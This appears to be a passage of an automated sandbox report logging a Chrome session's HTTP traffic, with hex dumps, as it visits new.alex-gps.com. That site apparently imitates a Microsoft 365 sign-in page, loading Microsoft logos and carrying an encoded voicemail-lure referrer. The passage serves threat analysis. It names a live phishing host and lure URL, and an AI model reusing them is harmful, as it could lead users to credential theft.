                                                      Data Ascii: 0\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.otpError2\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#e81123;\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\
                                                      2024-10-23 21:29:38 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 61 62 73 6f 6c 75 74 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7a 2d 69 6e 64 65 78 3a 5c 78 32 30 31 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 74 6f 70 3a 5c 78 32 30 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 69 64 74 68 3a 5c 78 32 30 31 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 68 65 61 64 65 72 5c 78 32 30
                                                      Data Ascii: \x20\x20\x20position:\x20absolute;\x0a\x20\x20\x20\x20\x20\x20\x20\x20z-index:\x201;\x0a\x20\x20\x20\x20\x20\x20\x20\x20top:\x200px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20width:\x20100%;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.header\x20
                                                      2024-10-23 21:29:38 UTC8000INData Raw: 72 6f 6c 6c 65 72 5c 78 32 30 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 38 29 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 74 6f 70 3a 5c 78 32 30 35 36 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 31 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 40 6b 65 79 66 72 61 6d 65 73 5c 78 32 30 6c 64 73 2d 72 6f 6c 6c 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                      Data Ascii: roller\x20div:nth-child(8):after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20top:\x2056px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x2012px;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20@keyframes\x20lds-roller\x20{\x0a\x20\x20\x20\x20\x20\x20\


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.1649640104.17.25.144436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:37 UTC578OUTGET /ajax/libs/font-awesome/6.1.1/css/all.min.css HTTP/1.1
                                                      Host: cdnjs.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://new.alex-gps.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:37 UTC944INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:37 GMT
                                                      Content-Type: text/css; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: public, max-age=30672000
                                                      ETag: W/"623a082a-4ef8"
                                                      Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT
                                                      cf-cdnjs-via: cfworker/kv
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Timing-Allow-Origin: *
                                                      X-Content-Type-Options: nosniff
                                                      CF-Cache-Status: HIT
                                                      Age: 6937
                                                      Expires: Mon, 13 Oct 2025 21:29:37 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4BsgRK6r62GZ%2Bf%2BFpIjUzeTspKUtIAAYdmw4HEHbQ5gevXuDlyiu%2Bi7EYJhijo1jF6aRjl%2Fjw03I24xyg9JRULgebV93Wht6PPaADMKwQCkN5uVgfl2d4fPfzY5EDfg9cCWZi17Z"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                      Strict-Transport-Security: max-age=15780000
                                                      Server: cloudflare
                                                      CF-RAY: 8d74d2da3e3846e9-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-10-23 21:29:37 UTC425INData Raw: 33 39 38 38 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 31 2e 31 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                      Data Ascii: 3988/*! * Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                      2024-10-23 21:29:37 UTC1369INData Raw: 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 65 6d 7d
                                                      Data Ascii: font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}
                                                      2024-10-23 21:29:37 UTC1369INData Raw: 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65
                                                      Data Ascii: ull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-dire
                                                      2024-10-23 21:29:37 UTC1369INData Raw: 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65
                                                      Data Ascii: imation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite
                                                      2024-10-23 21:29:37 UTC1369INData Raw: 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69
                                                      Data Ascii: ection,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animation-duration,1s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infi
                                                      2024-10-23 21:29:37 UTC1369INData Raw: 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 7d 2e 66 61 2d 73 70 69 6e 2d 72 65 76
                                                      Data Ascii: ar(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animation-timing,linear);animation-timing-function:var(--fa-animation-timing,linear)}.fa-spin-rev
                                                      2024-10-23 21:29:37 UTC1369INData Raw: 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74
                                                      Data Ascii: ransform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@-webkit-keyframes fa-bounce{0%{-webkit-t
                                                      2024-10-23 21:29:37 UTC1369INData Raw: 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 33 30 25 7b 2d 77 65 62 6b 69
                                                      Data Ascii: transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0)}30%{-webki
                                                      2024-10-23 21:29:37 UTC1369INData Raw: 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 2d 77
                                                      Data Ascii: -scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}@-w
                                                      2024-10-23 21:29:37 UTC1369INData Raw: 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d 31 32 25 2c 32 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 7d 31 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f
                                                      Data Ascii: rm:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,24%{-webkit-transform:rotate(-18deg);transform:rotate(-18deg)}12%,28%{-webkit-transform:rotate(18deg);transform:rotate(18deg)}16%{-webkit-transform:ro


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.1649646201.102.105.2364436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:37 UTC673OUTGET /favicon.ico HTTP/1.1
                                                      Host: new.alex-gps.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:37 UTC180INHTTP/1.1 404 Not Found
                                                      Date: Wed, 23 Oct 2024 21:29:37 GMT
                                                      Server: Apache/2.4.59 (Debian)
                                                      Content-Length: 279
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      2024-10-23 21:29:37 UTC279INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6e 65 77 2e 61 6c 65 78 2d 67 70 73 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.59 (Debian) Server at new.alex-gps.com Port 443</


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.164964513.107.246.454436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:37 UTC654OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                      Host: aadcdn.msauth.net
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://new.alex-gps.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:37 UTC779INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:37 GMT
                                                      Content-Type: image/svg+xml
                                                      Content-Length: 1435
                                                      Connection: close
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Encoding: gzip
                                                      Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                      ETag: 0x8DB5C3F4911527F
                                                      x-ms-request-id: e9787de0-e01e-0026-7d28-21fcf1000000
                                                      x-ms-version: 2009-09-19
                                                      x-ms-lease-status: unlocked
                                                      x-ms-blob-type: BlockBlob
                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                      Access-Control-Allow-Origin: *
                                                      x-azure-ref: 20241023T212937Z-16849878b78bkvbz1ry47zvsas00000006ug0000000091z2
                                                      x-fd-int-roxy-purgeid: 0
                                                      X-Cache: TCP_HIT
                                                      Accept-Ranges: bytes
                                                      2024-10-23 21:29:37 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                      Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.164964413.107.246.454436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:37 UTC652OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                      Host: logincdn.msauth.net
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://new.alex-gps.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:38 UTC779INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:38 GMT
                                                      Content-Type: image/svg+xml
                                                      Content-Length: 276
                                                      Connection: close
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Encoding: gzip
                                                      Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                      ETag: 0x8D79ED35591CF44
                                                      x-ms-request-id: 67980c6e-b01e-0076-0992-253ea1000000
                                                      x-ms-version: 2009-09-19
                                                      x-ms-lease-status: unlocked
                                                      x-ms-blob-type: BlockBlob
